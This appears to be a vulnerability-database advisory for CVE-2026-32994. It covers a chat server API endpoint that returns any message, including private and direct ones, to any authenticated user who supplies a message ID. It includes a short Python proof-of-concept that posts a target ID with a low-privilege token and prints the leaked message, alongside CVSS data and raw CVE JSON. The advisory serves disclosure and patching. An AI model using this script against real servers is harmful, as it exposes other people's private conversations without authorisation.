CVE-2026-32994

Description

The /api/v1/autotranslate.translateMessage endpoint in versions <8.5.0, <8.4.2, <8.3.4, <8.2.4, <8.1.5, <8.0.6, <7.13.8, and <7.10.12 allows any authenticated user to retrieve the full content of any message from any room (private groups, direct messages, channels) by simply providing the target message ID. The endpoint fetches the message via Messages.findOneById(messageId) with no room access check (canAccessRoomIdAsync is never called), returning the complete IMessage object including message text, sender info, room ID, timestamps, and markdown content.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

< 8.5.0

< 8.4.2

< 8.3.4

< 8.2.4

< 8.1.5

< 8.0.6

< 7.13.8

< 7.10.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL
url = "https://target-domain.com/api/v1/autotranslate.translateMessage"

# Headers with authentication token (Low privilege user)
headers = {
    "X-Auth-Token": "YOUR_LOW_PRIV_TOKEN",
    "X-User-Id": "YOUR_USER_ID",
    "Content-Type": "application/json"
}

# Payload containing the target message ID (e.g., from a private channel)
payload = {
    "messageId": "TARGET_MESSAGE_ID"
}

# Send request
response = requests.post(url, json=payload, headers=headers)

# Check response
if response.status_code == 200:
    print("Vulnerable! Leaked data:")
    print(response.json())
else:
    print(f"Request failed: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32994
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32994
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32994/
[4] VulDB https://vuldb.com/cve/CVE-2026-32994
[5] https://hackerone.com/reports/3713682

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32994", "sourceIdentifier": "[email protected]", "published": "2026-05-19T05:16:23.787", "lastModified": "2026-05-19T14:50:07.413", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The /api/v1/autotranslate.translateMessage endpoint in versions <8.5.0, <8.4.2, <8.3.4, <8.2.4, <8.1.5, <8.0.6, <7.13.8, and <7.10.12 allows any authenticated user to retrieve the full content of any message from any room (private groups, direct messages, channels) by simply providing the target message ID. The endpoint fetches the message via Messages.findOneById(messageId) with no room access check (canAccessRoomIdAsync is never called), returning the complete IMessage object including message text, sender info, room ID, timestamps, and markdown content."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://hackerone.com/reports/3713682", "source": "[email protected]"}]}}